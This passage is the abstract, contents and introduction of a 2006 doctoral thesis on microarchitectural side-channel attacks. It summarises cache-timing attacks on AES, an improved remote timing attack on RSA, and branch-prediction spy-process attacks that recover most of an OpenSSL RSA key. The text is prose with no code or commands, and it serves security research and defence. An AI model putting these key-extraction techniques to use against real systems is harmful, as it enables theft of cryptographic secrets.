AN ABSTRACT OF THE THESIS OF Onur Acıiçmez for the degree of Doctor of Philosophy in Electrical and Computer Engineering presented on December 08, 2006. Title: Advances in Side-Channel Cryptanalysis: MicroArchitectural Attacks Abstract approved: Çetin Kaya Koç Cryptographic devices leak timing and power consumption information that is easily measurable, radiation of various levels, and more. Such devices also have additional inputs, other than plaintext and keys, like voltage, which can be modified to force the device to produce certain faulty outputs that can be used to reveal the secret key. Side-channel cryptanalysis uses the information that leaks through one or more side channels of a cryptographic system to obtain secret information. The initial focus of side-channel research was on smart card security. There are two main reasons why smart cards were the first type of devices that was analyzed extensively from the side-channel point of view. Smart cards store secret values inside the card and they are especially designed to protect and process these secret values. Therefore, there is a serious financial gain involved in cracking smart cards, as well as, analyzing them and developing more secure smart card technologies. The recent promises from Trusted Computing community indicate the security assurance of storing such secret values in PC platforms, c.f. [99]. These promises have made the side-channel analysis of PC platforms as desirable as that of smart cards. The second reason of the high attention to side-channel analysis of smart cards is due to the ease of applying such attacks to them. The measurements of side-channel information on smart cards are almost “noiseless”, which makes such attacks very practical. On the other hand, there are many factors that affect such measurements on real commodity computer systems. These factors create noise, and therefore it is much more difficult to develop and perform successful attacks on such “real” computers within our daily life. Thus, until very recently the vulnerability of systems even running on servers was not “really” considered to be harmful by such side-channel attacks. This was changed with the work of Brumley and Boneh, c.f. [21], who demonstrated a remote timing attack over a local network. Because of the above reasons, we have seen an increased research effort on the security analysis of the daily life PC platforms from the side-channel point of view. Here, it has been especially shown that the functionality of the common components of processor architectures creates an indisputable security risk, c.f. [1, 2, 5, 14, 73, 80], which comes in different forms. In this thesis, we focus on side-channel cryptanalysis of cryptosystems on commodity computer platforms. Especially, we analyze two main CPU components, cache and branch prediction unit, from side-channel point of view. We show that the functionalities of these two components create very serious security risks in software systems, especially in software based cryptosystems. c Copyright by Onur Acıiçmez December 08, 2006 All Rights Reserved Advances in Side-Channel Cryptanalysis: MicroArchitectural Attacks by Onur Acıiçmez A THESIS submitted to Oregon State University in partial fulfillment of the requirements for the degree of Doctor of Philosophy Presented December 08, 2006 Commencement June 2007 Doctor of Philosophy thesis of Onur Acıiçmez presented on December 08, 2006 APPROVED: Major Professor, representing Electrical and Computer Engineering Director of the School of Electrical Engineering and Computer Science Dean of the Graduate School I understand that my thesis will become part of the permanent collection of Oregon State University libraries. My signature below authorizes release of my thesis to any reader upon request. Onur Acıiçmez, Author ACKNOWLEDGMENTS I wish to express my most sincere gratitude to my major professor, Dr. Çetin Kaya Koç, who recognized my potential, sparked my interest in this particular topic, and guided me throughout the development of this work. I would like to give my special thanks to Dr. Werner Schindler and Dr. Jean-Pierre Seifert for introducing me to the challenging field of Side-Channel Cryptanalysis, and especially for their guidance in conducting this research and producing the papers which formed a basis for this thesis. I also thank Dr. Bella Bose, Dr. Timothy Budd, Dr. Ben Lee, Dr. Lien Mei and Dr. Oksana Ostroverkhova for dedicating their time to participate in my Ph.D. committee. The most special thanks go to my parents for both their financial and emotional supports throughout my entire education. I would also like to acknowledge so many dearest friends, most of whom I have known for more than 20 years, for their encouragements to pursue my graduate education in USA. I apologize for being unable to list each and every one of those precious individuals in this page. Thanks also to my colleagues in Information Security Laboratory for their general support and being such good friends. Onur Acıiçmez Hillsboro, Oregon, December 2006 TABLE OF CONTENTS Page 1 INTRODUCTION . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 1.1 Overview of Side-Channel Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 1.2 The Importance of Side-Channel Analysis on Computer Systems . . . 5 1.3 New Side-Channel Sources on Processors: MicroArchitectural Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 Summary of Our Contributions to the Field . . . . . . . . . . . . . . . . . . . . . . . 8 1.4.1 Chapter 3: Remote Timing Attack on RSA . . . . . . . . . . . . . 9 1.4.2 Chapter 4: Survey on Cache Attacks . . . . . . . . . . . . . . . . . . . 9 1.4 1.4.3 Chapter 5: Cache Based Remote Timing Attack on the AES 10 1.4.4 Chapter 6: Trace-Driven Cache Attacks on AES . . . . . . . . . . 10 1.4.5 Chapter 7: Predicting Secret Keys via Branch Prediction . . . 10 1.4.6 Chapter 8: On the Power of Simple Branch Prediction Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 2 BACKGROUND . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 2.1 Basics of RSA and Its Implementations . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 2.1.1 Overview of RSA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 2.1.2 Exponentiation Algorithms . . . . . . . . . . . . . . . . . . . . . . . . . . 15 2.1.2.1 Binary Square-and-Multiply Exponentiation Algorithm . 15 2.1.2.2 b-ary Square-and-Multiply Exponentiation Algorithm . . 15 2.1.2.3 Sliding Window Exponentiation . . . . . . . . . . . . . . . . . . . 16 2.1.2.4 Balanced Montgomery Powering Ladder . . . . . . . . . . . . . 16 2.1.3 Montgomery Multiplication . . . . . . . . . . . . . . . . . . . . . . . . . . 20 2.1.4 Chinese Remainder Theorem . . . . . . . . . . . . . . . . . . . . . . . . . 21 2.2 Basics of AES and Its Implementations . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 2.2.1 Overview of AES . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 TABLE OF CONTENTS (Continued) Page 2.2.2 AES Software Implementations . . . . . . . . . . . . . . . . . . . . . . . 23 2.3 Basics of Computer Microarchitecture: Cache and Branch Prediction 25 2.3.1 Processor Cache . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25 2.3.2 Branch Prediction Units . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28 3 REMOTE TIMING ATTACK ON RSA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32 3.1 General Idea of a Timing Attack on RSA-CRT . . . . . . . . . . . . . . . . . . . . 33 3.2 Overview of Brumley and Boneh Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . 37 3.3 Details of Our Approach. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39 3.4 Implementation Details . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44 3.5 Experimental Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47 3.5.1 Comparison of our attack and BB-attack . . . . . . . . . . . . . . . 47 3.5.2 The details of our attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48 3.5.2.1 The distribution of time differences . . . . . . . . . . . . . . . . 49 3.5.2.2 Error probabilities and the parameters . . . . . . . . . . . . . . 50 3.6 4 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51 SURVEY ON CACHE ATTACKS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54 4.1 The Basics of a Cache Attack. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56 4.1.1 Basic Attack Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58 4.1.1.1 Model-1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58 4.1.1.2 Model-2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61 4.2 Cache Attacks in the Literature . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64 4.2.1 Theoretical Attack of D. Page . . . . . . . . . . . . . . . . . . . . . . . . 64 TABLE OF CONTENTS (Continued) Page 4.2.2 First Practical Implementations . . . . . . . . . . . . . . . . . . . . . . 66 4.2.3 Bernstein’s Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66 4.2.4 Percival’s Hyper-Threading Attack on RSA . . . . . . . . . . . . . 67 4.2.5 Osvik-Shamir-Tromer (OST) Attacks . . . . . . . . . . . . . . . . . . 68 4.2.6 Last Round Access-Driven Attack . . . . . . . . . . . . . . . . . . . . . 69 4.2.7 Cache-based Power Attack on AES from Bertoni et al. . . . . . 70 4.2.8 Lauradoux’s Power Attack on AES . . . . . . . . . . . . . . . . . . . . 71 4.2.9 Internal Cache Collision Attacks by Bonneau et al. . . . . . . . . 71 4.2.10 Overview of Our Cache Attacks . . . . . . . . . . . . . . . . . . . . . . 71 5 CACHE BASED REMOTE TIMING ATTACK ON THE AES . . . . . . . . . . 74 5.1 The Underlying Principal of Devising a Remote Cache Attack . . . . . 75 5.2 Details of Our Basic Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76 5.2.1 First Round Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77 5.2.2 Second Round Attack – Basic Variant . . . . . . . . . . . . . . . . . . 79 5.3 A More Efficient, Universally Applicable Attack . . . . . . . . . . . . . . . . . . . 80 5.3.1 Comparison with the basic second round attack from Subsect 5.2.2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82 6 5.4 Experimental Details and Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83 5.5 Scaling the Sample Size N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87 5.6 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 91 TRACE-DRIVEN CACHE ATTACKS ON AES . . . . . . . . . . . . . . . . . . . . . . . . . 92 6.1 Overview of Trace-Driven Cache Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . 92 TABLE OF CONTENTS (Continued) Page 6.2 Trace-Driven Cache Attacks on the AES . . . . . . . . . . . . . . . . . . . . . . . . . . . 95 6.2.1 Overview of an Ideal Two-Round Attack . . . . . . . . . . . . . . . 96 6.2.2 Overview of an Ideal Last Round Attack . . . . . . . . . . . . . . . 98 6.2.3 Complications in Reality and Actual Attack Scenarios . . . . . 100 6.2.4 Further Details of Our Attacks . . . . . . . . . . . . . . . . . . . . . . . 101 6.3 Analysis of the Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104 6.3.1 Our Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 105 6.3.2 Trade-off Between Online and Offline Cost . . . . . . . . . . . . . . 106 7 6.4 Experimental Details . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109 6.5 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 110 PREDICTING SECRET KEYS VIA BRANCH PREDICTION . . . . . . . . . 111 7.1 Outlines of Various Attack Principles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113 7.1.1 Attack 1 — Exploiting the Predictor Directly (Direct Timing Attack) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 114 7.1.1.1 Examples of vulnerable systems. . . . . . . . . . . . . . . . . . . . 116 7.1.2 Attack 2 — Forcing the BPU to the Same Prediction (Asynchronous Attack) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 117 7.1.2.1 Examples of vulnerable systems. . . . . . . . . . . . . . . . . . . . 119 7.1.3 Attack 3 — Forcing the BPU to the Same Prediction (Synchronous Attack) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 119 7.1.3.1 Examples of vulnerable systems. . . . . . . . . . . . . . . . . . . . 120 7.1.4 Attack 4 — Trace-driven Attack against the BTB (Asynchronous Attack) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 121 7.1.4.1 Examples of vulnerable systems. . . . . . . . . . . . . . . . . . . . 122 TABLE OF CONTENTS (Continued) Page 7.2 Practical Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122 7.2.1 Results for Attack 2 = Forcing the BPU to the Same Prediction (Asynchronous Attack) . . . . . . . . . . . . . . . . . . . . . . . 123 7.2.2 Results for Attack 4 = Trace-driven Attack against the BTB (Asynchronous Attack) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127 7.3 8 9 Conclusions and recommendations for further research . . . . . . . . . . . . . 129 ON THE POWER OF SIMPLE BRANCH PREDICTION ANALYSIS . . 132 8.1 Multi-Threading, spy and crypto processes. . . . . . . . . . . . . . . . . . . . . . . . . 134 8.2 Improving Trace-driven Attacks against the BTB . . . . . . . . . . . . . . . . . . 136 8.3 Practical Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 139 8.4 Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 142 CONCLUSION . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148 BIBLIOGRAPHY . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 153 LIST OF FIGURES Figure Page 2.1 Binary version of Square-and-Multiply Exponentiation Algorithm . . . 16 2.2 b-ary version of Square-and-Multiply Exponentiation Algorithm . . . . . 17 2.3 Sliding Window Exponentiation Algorithm . . . . . . . . . . . . . . . . . . . . . 18 2.4 Balanced Montgomery Powering Ladder . . . . . . . . . . . . . . . . . . . . . . . 19 2.5 Montgomery Multiplication Algorithm . . . . . . . . . . . . . . . . . . . . . . . . 21 2.6 RSA with CRT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 2.7 Round operations in AES . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24 2.8 Branch Prediction Unit Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . 31 3.1 Modular Exponentiation with Montgomery’s Algorithm . . . . . . . . . . . 34 3.2 The distribution of ∆j in terms of clock cycles for 0 ≤ j ≤ 5000, sorted in descending order, for the sample bit q61 . The graph on the left shows this distribution when q61 = 1. The distribution on the right is observed when q61 = 0. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49 4.1 Cache Attack Model-1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58 4.2 Cache states . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60 4.3 Two different accesses to the same table. . . . . . . . . . . . . . . . . . . . . . . . 62 4.4 DES S-Box lookup. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65 6.1 Figure.2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 107 6.2 Figure.3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 108 6.3 Figure.4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 108 7.1 Practical results when using the total eviction method in attack principle 2. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125 7.2 Practical results when using the single eviction method in attack principle 2. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127 7.3 Increasing gap between multiplication and squaring steps due to missing BTB entries. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128 LIST OF FIGURES (Continued) Figure Page 7.4 Connecting the spy-induced BTB misses and the square/multiply cycle gap. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131 8.1 Front-End Instruction Pipeline Stages feeding the µop Queue . . . . . . . 137 8.2 Results of SBPA with an improved resolution. . . . . . . . . . . . . . . . . . . . 141 8.3 Enhancing a bad resolution via independent repetition. . . . . . . . . . . . 143 8.4 Best result of our SBPA against openSSL RSA, yielding 508 out of 512 secret key bits. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144 LIST OF TABLES Table Page 3.1 The configuration used in the experiments . . . . . . . . . . . . . . . . . . . . . 45 3.2 Average ∆ and ∆BB values and 0-1 gaps. The values are given in terms of clock cycles. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46 3.3 The percentage of the majority of time differences that are either positive or negative (empirical values) . . . . . . . . . . . . . . . . . . . . . . . . . 50 3.4 Columns 2 and 3 show the parameters that can be used to yield the intended accuracy. The last columns give the expected number of steps for Nmax = ∞, calculated using Formula (3.11), to reach the target difference D. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52 7.1 The configuration used in the experiments . . . . . . . . . . . . . . . . . . . . . 124 Advances in Side-Channel Cryptanalysis: MicroArchitectural Attacks 1. INTRODUCTION Information security has always been a concern of human race. Even the ancient civilizations developed such methods that are the first examples of encryption algorithms. The advances in security fields, including cryptography, affected almost every aspect of human life and science. For example, the first programmable Turing machine, which can be considered as the first computer ever built even before ENIAC, was engineered to break cryptosystems like Enigma [104, 45]. The increasing importance of information technologies like electronic devices, personal computers, and of course the Internet in daily life has broadened the range and the need of information security. As an eventual result, the security related applications have gained even more popularity and become a fundamental and indispensable part of information systems. The mentioned reasons triggered the transition of the responsibility to handle security critical applications from mainframe computers and custom-built devices to widely used and high-volume manufactured general commodity electronics including personal computers, servers, handheld devices and smart cards. This transition also mandates a revision of how we design and analyze security systems by identifying, developing, and adapting new security requirements and threat models. The sole purpose of this thesis is to contribute to this revision process. We identify some components of commodity computers as novel and unforseen security risks. Our findings have significant value for processor vendors, software developers, system designers, security architects, cryptographers, and es- 2 pecially for ongoing secure platform development efforts (c.f. [99]) in the sense that they bring new security requirements and threat models that must be considered during secure microprocessor design, system and software development, and cryptosystem design. The identification of requirements for secure execution environments has always been a challenging task since the invention of high complexity computing devices. The security requirements of early computer systems were defined with monolithic mainframe computers in mind (c.f. [106, 13, 32] and also [46] for a nice collection of early computer security efforts). Today, the domination of multiuser PC and server platforms and also the multitasking operating systems mandates a serious revision of these early requirements. Recently, we have seen an increased effort on the security analysis of daily life computer platforms. The advances in the field, more specifically, the desire to develop secure execution technologies such as Intel’s Virtualization Technology (VT) and Trusted Execution Technology (TXT) (codenamed LeGrande Technology or LT for short), play an important role to increase attention on analysis of computer platform security due to [99]. Here, it has been especially shown that microarchitectural properties of modern CPU’s creates a significant security risk, (c.f. [5, 1, 2, 14, 72, 73, 80]). In this thesis, we analyze two main CPU components, cache and branch prediction unit, from sidechannel point of view. We show that the functionalities of these two components create v ery serious security risks in software systems, especially in software based cryptosystems. Cryptosystems have traditionally been analyzed as perfect mathematical objects. In those analyses, the cipher under examination is considered as a black box that realizes a mapping from the input values (plaintext and secret key) to an output (ciphertext). The security of a cipher is determined by analyzing its 3 mathematical description via formal and statistical methods. Therefore, conventional cryptography only deals with the mathematical model of the cryptosystems. However, any practical implementation of a cryptosystem causes the leakage of sensitive information due to the compulsory characteristics of the physical devices, which are ignored in the security models of conventional cryptography. Side-channel analysis, which is a relatively new area of applied cryptography, tries to fill in this gap between the theory of conventional cryptography and the actual physical situations of real world. Cryptographic devices leak timing and power consumption information that is easily measurable, radiation of various levels, and more. Such devices also have additional inputs, other than plaintext and keys, like voltage, which can be modified to force the device to produce certain faulty outputs that can be used to reveal the secret key. Side-channel cryptanalysis uses the information that leaks through one or more side channels of a cryptographic system to obtain secret information. It would be unrealistic to explain all the aspects of side-channel cryptanalysis in this document, hence we will give only a brief overview in Section 1.1. 1.1. Overview of Side-Channel Analysis Side channels of a cryptosystem include, but not restricted to, power consumption, execution time, and electromagnetic emanation. In other words, the secret key of a carelessly designed cryptographic device can be obtained by tracing the power consumption, electromagnetic emanation, and/or the execution time of the device. An attacker can learn about the processes that occur inside a cryptosystem and gain invaluable information about the secret key by analyzing the power 4 consumption of the system during encryption/decryption. Integrated circuits are built out of individual transistors acting as voltage-controlled switches. The motion of electrical charge through these transistors consumes power and produces electromagnetic radiation, both of which are externally detectable. Side-channel attacks, including power analysis attacks, have two typical phases: data collection and data analysis. Data collection involves sampling a device’s side-channel information, i.e., the power consumption or electromagnetic emanation as a function of time. In this phase, a sample of cryptographic operations, which are executed under the same key, are inspected. The next phase involves the analysis of the collected data and extracting information about the key. There are mainly two types of power analysis known in the literature: Simple Power Analysis (SPA) and Differential Power Analysis (DPA). SPA attacks involve direct interpretation of power consumption measurements collected during cryptographic computations. The sequence of performed operations determines the amount of power consumed by an electronic device. SPA attacks rely on observing the power consumption traces of an active device and these observations can reveal the sequence of operations executed in that device during a cryptographic computation. The operation sequences of some cipher implementations can directly be translated into the value of the secret key. DPA attacks are more powerful than SPA attacks, and they are harder to prevent. While SPA attacks use visual inspection to identify power fluctuations, DPA attacks use sophisticated statistical analysis and error-correction techniques to extract information about the secret key. The principles of Simple Power Analysis (SPA) and Differential Power Analysis (DPA) rely on the power consumption variations that are generated as a 5 consequence of varying sequences of operations executed depending on the values of plaintext inputs and the secret key. Similarly, Simple Electromagnetic Analysis (SEMA) and Differential Electromagnetic Analysis (DEMA) allow retrieving the key using the same concept as well, except that they use electromagnetic radiation measurements instead of power consumption. In this paper, we mainly focus on a specific type of side-channel attack, called timing attacks, that uses the execution time of cryptographic devices to reveal the secret data. In a timing attack, the adversary observes the running time of a cryptosystem for different inputs and compromises the secret key using this time behavior. Timing attacks are based on the fact that certain cryptosystems take different amounts of time to process different inputs. So far, typical targets of side-channel attacks have been smart cards. The side-channel analysis of computer systems attracted much less attention compared to smart cards. The main reasons of this trend are explained in Section 1.2. However, due to the recent advances in the security area, side-channel analysis of computer systems has recently gained significant importance. Moreover, it has been realized that some of the components of modern computer microarchitectures leak certain side-channel information and thus create unforeseen security risks, c.f. [5, 1, 2, 73, 14, 80]. In this thesis, we tackle this particular problem and contribute to the field via identification, analysis, and mitigation of microarchitectural side-channel vulnerabilities. 1.2. The Importance of Side-Channel Analysis on Computer Systems Side-channel cryptanalysis has attracted very significant attention since Kocher’s discoveries of timing and power analysis attacks [59, 60]. He showed that 6 cryptographic implementations leak sensitive information because of the physical properties and requirements of the devices the systems are implemented on. The classical cryptography, which analyzes the cryptosystems as perfect mathematical objects and ignores the physical analysis of the implementations, fails to identify such side-channel leakages. Therefore it is inevitable to utilize both classical cryptography and side-channel cryptanalysis in order to develop and implement secure systems. The initial focus of side-channel research was on smart card security. A smart card is a standard credit card-sized plastic token with an embedded microchip that makes it “smart”. They are used for identification or financial transactions and therefore need built-in security features. The clock signal and the electrical power are among the inputs taken from outside in today’s smart cards. Hence, the power consumption and the execution time of a smart card are very easy to measure with almost no noise. This property of smart cards makes them more vulnerable to side-channel attacks than computer systems. The security community has more or less a clear picture of what the sidechannel vulnerabilities of smart cards are, what the threat models are, and how to mitigate side-channel attacks on smart cards. There are two main reasons why smart cards were the first type of devices that was analyzed extensively from the side-channel point of view. Smart cards store secret values inside the card and they are especially designed to protect and process these secret values. Therefore, there is a serious financial gain involved in cracking smart cards, as well as, analyzing them and developing more secure smart card technologies. The recent promises from Trusted Computing community indicate the security assurance of storing such secret values in PC platforms, c.f. [99]. These promises have made the sidechannel analysis of PC platforms as desirable as that of smart cards. 7 The second reason of the high attention to side-channel analysis of smart cards is due to the ease of applying such attacks to them. The measurements of side-channel information on smart cards are almost “noiseless”, which makes such attacks very practical. On the other hand, there are many factors that affect such measurements on real commodity computer systems. These factors create noise, and therefore it is much more difficult to develop and perform successful attacks on such “real” computers within our daily life. Thus, until very recently the vulnerability of systems even running on servers was not “really” considered to be harmful by such side-channel attacks. This was changed with the work of Brumley and Boneh, c.f. [21], who demonstrated a remote timing attack over a local network. They simply adapted the attack principle as introduced in [85] to show that side-channel attacks are a real danger not only to smart cards but also to widely used computer systems. 1.3. New Side-Channel Sources on Processors: MicroArchitectural Attacks Because of the above reasons, we have seen an increased research effort on the security analysis of the daily life PC platforms from the side-channel point of view. Here, it has been especially shown that the functionality of the common components of processor architectures creates an indisputable security risk, c.f. [1, 2, 5, 14, 73, 80], which comes in different forms. Although the cache itself has been known for a long time being a crucial security risk of modern CPU’s, c.f. [95, 48], [5, 14, 73, 80] were the first proving such vulnerabilities practically and raised large public interest in such vulnerabilities. These advances initiated a new research vector to identify, analyze, and mitigate the security vulnerabilities that are created by the design and implementation of processor components. 8 Especially in the light of ongoing Trusted Computing efforts, cf. [99], which promise to turn the commodity PC platform into a trustworthy platform, c.f. also [25, 35, 42, 79, 99, 103], the formerly described side channel attacks against PC platforms are of particular interest. This is due to the fact that side channel attacks have been completely ignored by the Trusted Computing community so far. Even more interesting is the fact that all of the above pure software side channel attacks also allow a totally unprivileged process to attack other processes running in parallel on the same processor (or even remote), despite sophisticated partitioning methods such as memory protection, sandboxing or even virtualization. This particularly means that side channel attacks render all of the sophisticated protection mechanisms as for (e.g.) described in [42, 103] as useless. The simple reason for the failure of these trust mechanisms is that the new side-channel attacks simply exploit deeper processor ingredients — i.e., below the trust architecture boundary, c.f. [81, 42]. We define MicroArchitectural Side-Channel Attacks as the attacks that exploit the side-channel leakage due to the microarchitectural properties of microprocessors. So far, we have seen two types of microarchitectural attacks, cache and branch prediction analysis, which are discussed in detail in this thesis. 1.4. Summary of Our Contributions to the Field In this document, we present the details of our works in MicroArchitectural Side-Channel Analysis area. We also give an overview of the first remote timing attack on computers, i.e., Brumley and Boneh Attack [21], and propose certain improvements over this original attack. 9 The following subsections summarize our contributions and also the content of this thesis. 1.4.1. Chapter 3: Remote Timing Attack on RSA Since the remarkable work of Kocher [59], several papers considering different types of timing attacks have been published. In 2003, Brumley and Boneh presented a timing attack on unprotected OpenSSL implementations [21]. In this chapter, we discuss how to improve the efficiency of their attack by a factor of more than 10. We exploit the timing behavior of Montgomery multiplications in the table initialization phase, which allows us to increase the number of multiplications that provide useful information to reveal one of the prime factors of RSA moduli. We also present other improvements, which can be applied to the attack in [21]. 1.4.2. Chapter 4: Survey on Cache Attacks This chapter gives a nice overview of current cache-based side-channel attacks in the literature. We first describe two different attack models that constitute the basis of various cache-based attacks. Then we discuss the details of each cache attack seperately. We omit the details of our own attacks in this chapter, since they are discussed in depth in the following chapters. 10 1.4.3. Chapter 5: Cache Based Remote Timing Attack on the AES We introduce a new robust cache-based timing attack on AES. We present experiments and concrete evidence that our attack can be used to obtain secret keys of remote cryptosystems if the server under attack runs on a multitasking or simultaneous multithreading system with a large enough workload. This is an important difference to recent cache-based timing attacks as these attacks either did not provide any supporting experimental results indicating if they can be applied remotely, or they are not realistically remote attacks. 1.4.4. Chapter 6: Trace-Driven Cache Attacks on AES In this chapter, we present efficient trace-driven cache attacks on a widely used implementation of the AES cryptosystem. We also evaluate the cost of the proposed attacks in detail under the assumption of a noiseless environment. We develop an accurate mathematical model that we use in the cost analysis of our attacks. We use two different metrics, specifically, the expected number of necessary traces and the cost of the analysis phase, for the cost evaluation purposes. Each of these metrics represents the cost of a different phase of the attack. 1.4.5. Chapter 7: Predicting Secret Keys via Branch Prediction This chapter announces a new software side-channel attack — enabled by the branch prediction capability common to all modern high-performance CPUs. The penalty paid (extra clock cycles) for a mispredicted branch can be used for 11 cryptanalysis of cryptographic primitives that employ a data-dependent program flow. Analogous to the recently described cache-based side-channel attacks our attacks also allow an unprivileged process to attack other processes running in parallel on the same processor, despite sophisticated partitioning methods such as memory protection, sandboxing or even virtualization. In this chapter, we discuss several such attacks for the example of RSA, and experimentally show their applicability to real systems, such as OpenSSL and Linux. Moreover, we also demonstrate the strength of the branch prediction side-channel attack by rendering the obvious countermeasure in this context (Montgomery Multiplication with dummy-reduction) as useless. Although the deeper consequences of the latter result make the task of writing an efficient and secure modular exponentiation (or scalar multiplication on an elliptic curve) a challenging task, we eventually suggest some countermeasures to mitigate branch prediction side-channel attacks. 1.4.6. Chapter 8: On the Power of Simple Branch Prediction Analysis Very recently, we have discovered a new software side-channel attack, called Branch Prediction Analysis (BPA) attack, and also demonstrated their practicality on popular commodity PC platforms. While the above recent attack still had the flavor of a classical timing attack against RSA, where one uses many executiontime measurements under the same key in order to statistically amplify some small but key-dependent timing differences, we dramatically improve upon the former result. We prove that a carefully written spy-process running simultaneously with an RSA-process, is able to collect during one single RSA signing execution almost all of the secret key bits. We call such an attack, analyzing the CPU’s Branch Predictor states through spying on a single quasi-parallel computation process, 12 a Simple Branch Prediction Analysis (SBPA) attack — sharply differentiating it from those one relying on statistical methods and requiring many computation measurements under the same key. The successful extraction of almost all secret key bits by our SBPA attack against an OpenSSL RSA implementation proves that the often recommended blinding or so called randomization techniques to protect RSA against side-channel attacks are, in the context of SBPA attacks, totally useless. Additional to that very crucial security implication, targeted at such implementations which are assumed to be at least statistically secure, our successful SBPA attack also bears another equally critical security implication. Namely, in the context of simple side-channel attacks, it is widely believed that equally balancing the operations after branches is a secure countermeasure against such simple attacks. Unfortunately, this is not true, as even such “balanced branch” implementations can be completely broken by our SBPA attacks. Moreover, despite sophisticated hardware-assisted partitioning methods such as memory protection, sandboxing or even virtualization, SBPA attacks empower an unprivileged process to successfully attack other processes running in parallel on the same processor. Thus, we conclude that SBPA attacks are much more dangerous than previously anticipated, as they obviously do not belong to the same category as pure timing attacks. 13 2. BACKGROUND In this section, we give the necessary background information to understand the rest of this document. This section focuses on two encryption algorithms: RSA, which is the most widely used public-key cryptosystem, and AES, which is the new American standard for secret-key encryption. We also give basic information on some of the processor components, more specifically on the cache and branch prediction unit, which are analyzed from a side-channel point of view in this document. In order to keep this document in a reasonable size, we omit many details on the aformentioned subjects. We simply refer the reader to the following references for further details: • Cryptography: [64, 90, 97, 56, 96, 104, 98] • RSA: [82, 17, 12, 49, 50, 84, 29, 57, 58] • AES: [31, 8, 9] • Computer 